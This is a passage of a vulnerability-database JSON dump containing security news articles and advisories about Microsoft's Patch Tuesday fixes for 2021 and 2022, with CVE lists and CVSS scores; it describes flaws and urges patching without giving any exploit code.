([CSRSS](<https://en.wikipedia.org/wiki/Client/Server_Runtime_Subsystem>)) that could be abused by an attacker to gain SYSTEM permissions.\n\n\"With this level of access, the attackers are able to disable local services such as Endpoint Detection and Security tools,\" Kev Breen, director of cyber threat research at Immersive Labs, told The Hacker News. \"With SYSTEM access they can also deploy tools like Mimikatz which can be used to recover even more admin and domain level accounts, spreading the threat quickly.\"\n\nVery little is known about the nature and scale of the attacks other than an \"Exploitation Detected\" assessment from Microsoft. 
The company's Threat Intelligence Center (MSTIC) and Security Response Center (MSRC) have been credited with reporting the flaw.\n\nBesides CVE-2022-22047, two more elevation of privilege flaws have been fixed in the same component \u2014 [CVE-2022-22026](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22026>) (CVSS score: 8.8) and [CVE-2022-22049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22049>) (CVSS score: 7.8) \u2014 that were reported by Google Project Zero researcher Sergei Glazunov.\n\n\"A locally authenticated attacker could send specially crafted data to the local CSRSS service to elevate their privileges from [AppContainer](<https://docs.microsoft.com/windows/win32/secauthz/appcontainer-isolation>) to SYSTEM,\" Microsoft said in an advisory for CVE-2022-22026.\n\n\"Because the AppContainer environment is considered a defensible security boundary, any process that is able to bypass the boundary is considered a change in Scope. The attacker could then execute code or access resources at a higher integrity level than that of the AppContainer execution environment.\"\n\nAlso remediated by Microsoft are a number of remote code execution bugs in Windows Network File System ([CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) and [CVE-2022-22039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22039>)), Windows Graphics ([CVE-2022-30221](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221>)), Remote Procedure Call Runtime ([CVE-2022-22038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22038>)), and Windows Shell ([CVE-2022-30222](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30222>)).\n\nThe update further stands out for patching as many as 32 issues in the [Azure Site Recovery](<https://docs.microsoft.com/en-us/azure/site-recovery/site-recovery-overview>) business continuity service. 
Two of these flaws are related to remote code execution and the remaining 30 concern privilege escalation.\n\n\"Successful exploitation [...] requires an attacker to compromise admin credentials to one of the VMs associated with the configuration server,\" the company said, adding the flaws do not \"allow disclosure of any confidential information, but could allow an attacker to modify data that could result in the service being unavailable.\"\n\nOn top of that, Microsoft's July update also contains fixes for four privilege escalation vulnerabilities in the Windows Print Spooler module ([CVE-2022-22022](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22022>), [CVE-2022-22041](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22041>), [CVE-2022-30206](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30206>), and [CVE-2022-30226](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30226>)) after a [brief respite in June 2022](<https://thehackernews.com/2022/06/patch-tuesday-microsoft-issues-fix-for.html>), underscoring what appears to be a never-ending stream of flaws plaguing the technology.\n\nRounding off the Patch Tuesday updates are two notable fixes for tampering vulnerabilities in the Windows Server Service ([CVE-2022-30216](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30216>)) and Microsoft Defender for Endpoint ([CVE-2022-33637](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33637>)) and three denial-of-service (DoS) flaws in Internet Information Services ([CVE-2022-22025](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22025>) and [CVE-2022-22040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22040>)) and Security Account Manager ([CVE-2022-30208](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30208>)).\n\n### Software Patches from Other Vendors\n\nIn addition to Microsoft, security updates have also 
been released by other vendors since the start of the month to rectify several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [AMD](<https://www.amd.com/en/corporate/product-security>)\n * [Android](<https://source.android.com/security/bulletin/2022-07-01>)\n * [Apache Projects](<https://blogs.apache.org/foundation/date/20220712>)\n * [Cisco](<https://thehackernews.com/2022/07/cisco-and-fortinet-release-security.html>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [Fortinet](<https://thehackernews.com/2022/07/cisco-and-fortinet-release-security.html>)\n * [GitLab](<https://about.gitlab.com/releases/2022/07/04/gitlab-15-1-2-released/>)\n * [Google Chrome](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>)\n * [HP](<https://support.hp.com/us-en/security-bulletins>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * [Lenovo](<https://support.lenovo.com/us/en/product_security/ps500001-lenovo-product-security-advisories>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/July-2022>)\n * [Qualcomm](<https://docs.qualcomm.com/product/publicresources/securitybulletin/july-2022-bulletin.html>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider 
Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-13T04:15:00", "type": "thn", "title": "Microsoft Releases Fix for Zero-Day Flaw in July 2022 Security Patch Rollout", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-22022", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22047", "CVE-2022-22049", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30216", "CVE-2022-30221", "CVE-2022-30222", "CVE-2022-30226", "CVE-2022-33637"], "modified": "2022-07-13T05:36:49", "id": "THN:8C2FBC83F6EC62900F1887F00903447F", "href": "https://thehackernews.com/2022/07/microsoft-releases-fix-for-zero-day.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "krebs": [{"lastseen": "2021-06-15T08:32:06", "description": "**Microsoft** today released another round of security updates for **Windows** operating systems and supported software, _including fixes for six zero-day bugs that malicious hackers already are exploiting in active attacks._\n\nJune's Patch Tuesday addresses just 49 
security holes -- about half the normal number of vulnerabilities lately. But what this month lacks in volume it makes up for in urgency: Microsoft warns that bad guys are leveraging a half-dozen of those weaknesses to break into computers in targeted attacks.\n\nAmong the zero-days are:\n\n-[CVE-2021-33742](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742>), a remote code execution bug in a Windows HTML component. \n-[CVE-2021-31955](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31955>), an information disclosure bug in the Windows Kernel \n-[CVE-2021-31956](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31956>), an elevation of privilege flaw in Windows NTFS \n-[CVE-2021-33739](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33739>), an elevation of privilege flaw in the Microsoft Desktop Window Manager \n-[CVE-2021-31201](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31201>), an elevation of privilege flaw in the Microsoft Enhanced Cryptographic Provider \n-[CVE-2021-31199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31199>), an elevation of privilege flaw in the Microsoft Enhanced Cryptographic Provider\n\n**Kevin Breen**, director of cyber threat research at **Immersive Labs**, said elevation of privilege flaws are just as valuable to attackers as remote code execution bugs: Once the attacker has gained an initial foothold, he can move laterally across the network and uncover further ways to escalate to system or domain-level access.\n\n"This can be hugely damaging in the event of ransomware attacks, where high privileges can enable the attackers to stop or destroy backups and other security tools," Breen said. 
"The 'exploit detected' tag means attackers are actively using them, so for me, it\u2019s the most important piece of information we need to prioritize the patches."\n\nMicrosoft also patched five critical bugs -- flaws that can be remotely exploited to seize control over the targeted Windows computer without any help from users. [CVE-2021-31959](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31959>) affects everything from **Windows 7** through **Windows 10** and **Server** versions **2008**, **2012**, **2016** and **2019**.\n\n**Sharepoint** also got a critical update in [CVE-2021-31963](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31963>); Microsoft says this one is less likely to be exploited, but then critical Sharepoint flaws are a favorite target of ransomware criminals.\n\nInterestingly, two of the Windows zero-day flaws -- CVE-2021-31201 and CVE-2021-31199 -- are related to a patch **Adobe** released recently for [CVE-2021-28550](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>), a flaw in **Adobe Acrobat** and **Reader** that also is being actively exploited.\n\n"Attackers have been seen exploiting these vulnerabilities by sending victims specially crafted PDFs, often attached in a phishing email, that when opened on the victim's machine, the attacker is able to gain arbitrary code execution," said **Christopher Hass**, director of information security and research at **Automox**. "There are no workarounds for these vulnerabilities, patching as soon as possible is highly recommended."\n\nIn addition to updating Acrobat and Reader, Adobe patched flaws in a slew of other products today, including **Adobe Connect**, **Photoshop**, and **Creative Cloud**. The full list is [here](<https://helpx.adobe.com/security.html>), with links to updates.\n\nThe usual disclaimer:\n\nBefore you update with this month\u2019s patch batch, please make sure you have backed up your system and/or important files. 
It\u2019s not uncommon for Windows updates to hose one\u2019s system or prevent it from booting properly, and some updates even have been known to erase or corrupt files.\n\nSo do yourself a favor and backup _before_ installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.\n\nFor a quick visual breakdown of each update released today and its severity level, check out the [this Patch Tuesday post](<https://isc.sans.edu/forums/diary/Microsoft+June+2021+Patch+Tuesday/27506/>) from the **SANS Internet Storm Center**.", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-08T20:53:28", "type": "krebs", "title": "Microsoft Patches Six Zero-Day Security Holes", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": 
false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31959", "CVE-2021-31963", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-08T20:53:28", "id": "KREBS:E374075CAB55D7AB06EBD73CB87D33CD", "href": "https://krebsonsecurity.com/2021/06/microsoft-patches-six-zero-day-security-holes/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-21T10:08:03", "description": "**Microsoft** today released software updates to plug at least 44 security vulnerabilities in its **Windows** operating systems and related products. The software giant warned that attackers already are pouncing on one of the flaws, which ironically enough involves an easy-to-exploit bug in the software component responsible for patching **Windows 10** PCs and **Windows Server 2019** machines.\n\n\n\nMicrosoft said attackers have seized upon [CVE-2021-36948](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36948>), which is a weakness in the **Windows Update Medic** service. Update Medic is a new service that lets users repair Windows Update components from a damaged state so that the device can continue to receive updates.\n\nRedmond says while CVE-2021-36948 is being actively exploited, it is not aware of exploit code publicly available. 
The flaw is an "elevation of privilege" vulnerability that affects Windows 10 and **Windows Server 2019**, meaning it can be leveraged in combination with another vulnerability to let attackers run code of their choice as administrator on a vulnerable system.\n\n"CVE-2021-36948 is a privilege escalation vulnerability - the cornerstone of modern intrusions as they allow attackers the level of access to do things like hide their tracks and create user accounts," said **Kevin Breen** of [Immersive Labs](<https://www.immersivelabs.com>). "In the case of ransomware attacks, they have also been used to ensure maximum damage."\n\nAccording to Microsoft, critical flaws are those that can be exploited remotely by malware or malcontents to take complete control over a vulnerable Windows computer -- and with little to no help from users. Top of the heap again this month: Microsoft also took another stab at fixing a broad class of weaknesses in its printing software.\n\nLast month, the company rushed out an emergency update to patch "[PrintNightmare](<https://krebsonsecurity.com/2021/07/microsoft-issues-emergency-patch-for-windows-flaw/>)" -- a critical hole in its Windows Print Spooler software that was being attacked in the wild. 
Since then, a number of researchers have discovered holes in that patch, allowing them to circumvent its protections.\n\nToday's Patch Tuesday fixes another critical Print Spooler flaw ([CVE-2021-36936](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36936>)), but it's not clear if this bug is a variant of PrintNightmare or a unique vulnerability all on its own, said **Dustin Childs** at **Trend Micro's Zero Day Initiative**.\n\n"Microsoft does state low privileges are required, so that should put this in the non-wormable category, but you should still prioritize testing and deployment of this Critical-rated bug," Childs said.\n\nMicrosoft said the Print Spooler patch it is pushing today should address all publicly documented security problems with the service.\n\n"Today we are addressing this risk by changing the default Point and Print driver installation and update behavior to require administrator privileges," Microsoft said in a blog post. "This change may impact Windows print clients in scenarios where non-elevated users were previously able to add or update printers. However, we strongly believe that the security risk justifies the change. 
This change will take effect with the installation of the security updates released on August 10, 2021 for all versions of Windows, and is documented as [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34481>)."\n\nAugust brings yet another critical patch ([CVE-2021-34535](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34535>)) for the **Windows Remote Desktop** service, and this time the flaw is in the Remote Desktop client instead of the server.\n\n[CVE-2021-26424](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26424>) -- a scary, critical bug in the **Windows TCP/IP** component -- earned a CVSS score of 9.9 (10 is the worst), and is present in **Windows 7** through **Windows 10**, and Windows Server 2008 through 2019 (Windows 7 is no longer being supported with security updates).\n\nMicrosoft said it was not aware of anyone exploiting this bug yet, although the company assigned it the label "exploitation more likely," meaning it may not be difficult for attackers to figure out. CVE-2021-26424 could be exploited by sending a single malicious data packet to a vulnerable system.\n\nFor a complete rundown of all patches released today and indexed by severity, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/Microsoft+August+2021+Patch+Tuesday/27736/>) from the **SANS Internet Storm Center**. And it's not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com/2021/defcon-2-august-updates-include-print-spooler-fixes/>) usually has the lowdown on any patches that are causing problems for Windows users.\n\nOn that note, before you update _please_ make sure you have backed up your system and/or important files. 
It\u2019s not uncommon for a Windows update package to hose one\u2019s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.\n\nSo do yourself a favor and backup before installing any patches. Windows 10 even has some [built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, [see this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nIf you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a decent chance other readers have experienced the same and may chime in here with useful tips.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-10T21:12:58", "type": "krebs", "title": "Microsoft Patch Tuesday, August 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26424", "CVE-2021-34481", "CVE-2021-34535", "CVE-2021-36936", "CVE-2021-36948"], "modified": "2021-08-10T21:12:58", "id": "KREBS:AE87E964E683A56CFE4E51E96F3530AD", "href": "https://krebsonsecurity.com/2021/08/microsoft-patch-tuesday-august-2021-edition/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-16T21:59:04", "description": "**Microsoft** today released updates to fix at least 86 security vulnerabilities in its **Windows** operating systems and other software, including a weakness in all supported versions of Windows that Microsoft warns is actively being exploited. The software giant also has made a controversial decision to put the brakes on a plan to block **macros** in **Office** documents downloaded from the Internet.\n\n\n\nIn February, security experts hailed Microsoft's decision to block VBA macros in all documents downloaded from the Internet. The company said it would roll out the changes in stages between April and June 2022.\n\nMacros have long been a trusted way for cybercrooks to trick people into running malicious code. Microsoft Office by default warns users that enabling macros in untrusted documents is a security risk, but those warnings can be easily disabled with the click of button. Under Microsoft's plan, the new warnings provided no such way to enable the macros.\n\nAs _Ars Technica_ veteran reporter **Dan Goodin** [put it](<https://arstechnica.com/information-technology/2022/07/microsoft-makes-major-course-reversal-allows-office-to-run-untrusted-macros/>), "security professionals\u2014some who have spent the past two decades watching clients and employees get infected with ransomware, wipers, and espionage with frustrating regularity\u2014cheered the change."\n\nBut last week, Microsoft abruptly changed course. 
As [first reported](<https://www.bleepingcomputer.com/news/microsoft/microsoft-rolls-back-decision-to-block-office-macros-by-default/>) by _BleepingComputer_, Redmond said it would roll back the changes based on feedback from users.\n\n"While Microsoft has not shared the negative feedback that led to the rollback of this change, users have reported that they are unable to find the Unblock button to remove the Mark-of-the-Web from downloaded files, making it impossible to enable macros," Bleeping's **Sergiu Gatlan** wrote.\n\nMicrosoft later said the decision to roll back turning off macros by default was temporary, although it has not indicated when this important change might be made for good.\n\nThe zero-day Windows vulnerability already seeing active attacks is [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), which is an elevation of privilege vulnerability in all supported versions of Windows. Trend Micro's **Zero Day Initiative** notes that while this bug is listed as being under active attack, there\u2019s no information from Microsoft on where or how widely it is being exploited.\n\n"The vulnerability allows an attacker to execute code as SYSTEM, provided they can execute other code on the target," ZDI's Dustin Childs [wrote](<https://www.zerodayinitiative.com/blog/2022/7/12/the-july-2022-security-update-review>). "Bugs of this type are typically paired with a code execution bug, usually a specially crafted Office or Adobe document, to take over a system. 
These attacks often rely on macros, which is why so many were disheartened to hear Microsoft\u2019s delay in blocking all Office macros by default."\n\n**Kevin Breen**, director of cyber threat research at **Immersive Labs**, said CVE-2022-22047 is the kind of vulnerability that is typically seen abused after a target has already been compromised.\n\n"Crucially, it allows the attacker to escalate their permissions from that of a normal user to the same permissions as the SYSTEM," he said. "With this level of access, the attackers are able to disable local services such as Endpoint Detection and Security tools. With SYSTEM access they can also deploy tools like Mimikatz which can be used to recover even more admin and domain level accounts, spreading the threat quickly."\n\nAfter a brief reprieve from patching serious security problems in the **Windows Print Spooler** service, we are back to business as usual. July's patch batch contains fixes for four separate elevation of privilege vulnerabilities in Windows Print Spooler, identified as [CVE-2022-22022](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22022>), [CVE-2022-22041](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22041>), [CVE-2022-30206](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30206>), and [CVE-2022-30226](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30226>). Experts at security firm **Tenable** note that these four flaws provide attackers with the ability to delete files or gain SYSTEM level privileges on a vulnerable system.\n\nRoughly a third of the patches issued today involve weaknesses in Microsoft's Azure Site Recovery offering. 
Other components seeing updates this month include **Microsoft Defender for Endpoint**; **Microsoft Edge** (Chromium-based); **Office**; **Windows BitLocker**; **Windows Hyper-V**; **Skype for Business** and **Microsoft Lync**; and **Xbox**.\n\nFour of the flaws fixed this month address vulnerabilities Microsoft rates "critical," meaning they could be used by malware or malcontents to assume remote control over unpatched Windows systems, usually without any help from users. [CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) and [CVE-2022-22039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22039>) affect Network File System (NFS) servers, and [CVE-2022-22038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22038>) affects the Remote Procedure Call (RPC) runtime.\n\n"Although all three of these will be relatively tricky for attackers to exploit due to the amount of sustained data that needs to be transmitted, administrators should patch sooner rather than later," said **Greg Wiseman**, product manager at **Rapid7**. "[CVE-2022-30221](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221>) supposedly affects the Windows Graphics Component, though Microsoft\u2019s FAQ indicates that exploitation requires users to access a malicious RDP server."\n\nSeparately, Adobe today [issued patches](<https://helpx.adobe.com/security.html>) to address at least 27 vulnerabilities across multiple products, including **Acrobat** and **Reader**, **Photoshop**, **RoboHelp**, and **Adobe Character Animator**.\n\nFor a closer look at the patches released by Microsoft today and indexed by severity and other metrics, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/Microsoft%20July%202022%20Patch%20Tuesday/28838/>) from the **SANS Internet Storm Center**. 
And it\u2019s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com/>) usually has the lowdown on any patches that may be causing problems for Windows users.\n\nAs always, please consider backing up your system or at least your important documents and data before applying system updates. And if you run into any problems with these updates, please drop a note about it here in the comments.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-13T01:02:49", "type": "krebs", "title": "Microsoft Patch Tuesday, July 2022 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22022", "CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22041", "CVE-2022-22047", "CVE-2022-30206", "CVE-2022-30221", "CVE-2022-30226"], "modified": "2022-07-13T01:02:49", "id": "KREBS:4D5B2D5FA1A6E077B46D7F3051319E72", "href": "https://krebsonsecurity.com/2022/07/microsoft-patch-tuesday-july-2022-edition/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": 
"2022-02-16T19:34:43", "description": "A use-after-free vulnerability exists in Adobe Acrobat and Reader. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Acrobat and Reader Use After Free (APSB21-29: CVE-2021-28550)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550"], "modified": "2021-05-18T00:00:00", "id": "CPAI-2021-0278", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:38:06", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2022-07-12T07:00:00", "id": "KB5015877", "href": "https://support.microsoft.com/en-us/help/5015877", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-19T10:54:09", "description": "None\n## **Summary**\n\nLearn more about this cumulative security update, including improvements, any known issues, and how to get the update. \n\n**REMINDER**[Windows 8.1](<https://docs.microsoft.com/lifecycle/products/windows-81>) will reach end of support on January 10, 2023 for all editions, at which point technical assistance and software updates will no longer be provided. If you have devices running Windows 8.1, we recommend upgrading them to a more current, in-service, and supported Windows release. If devices do not meet the technical requirements to run a more current release of Windows, we recommend that you replace the device with one that supports Windows 11.Microsoft will not be offering an Extended Security Update (ESU) program for Windows 8.1. Continuing to use Windows 8.1 after January 10, 2023 may increase an organization\u2019s exposure to security risks or impact its ability to meet compliance obligations.For more information, see [Windows 8.1 support will end on January 10, 2023](<https://support.microsoft.com/windows/windows-8-1-support-will-end-on-january-10-2023-3cfd4cde-f611-496a-8057-923fba401e93>).[Windows Server 2012 R2](<https://docs.microsoft.com/lifecycle/products/windows-server-2012-r2>) will reach end of support on October 10, 2023 for Datacenter, Essentials, Embedded Systems, Foundation, and Standard.\n\n**Note** For information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). 
To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).

## **Improvements**

This cumulative security update includes improvements that are part of update [KB5014738](<https://support.microsoft.com/help/5014738>) (released June 14, 2022) and includes new improvements for the following issues:

 * Starting with this release, we are displaying a dialog box to remind users about the End of Support (EOS) for Windows 8.1 in January 2023. If you click **Remind me later**, the dialog box will appear once every 35 days. If you click **Remind me after the end of support date**, the dialog box will not appear again until after the EOS date. This reminder does not appear on the following:
   * Managed Pro and Enterprise devices.
   * Windows Embedded 8.1 Industry Enterprise and Windows Embedded 8.1 Industry Pro devices.
 * When you use [Encrypting File System (EFS)](<https://docs.microsoft.com/windows/win32/fileio/file-encryption>) files over a remote [Web Distributed Authoring and Versioning (WebDAV) protocol](<https://docs.microsoft.com/openspecs/windows_protocols/ms-wdv/bfde1057-4214-4ca5-a431-fab36ff625bc>) connection, the connection might be unsuccessful.
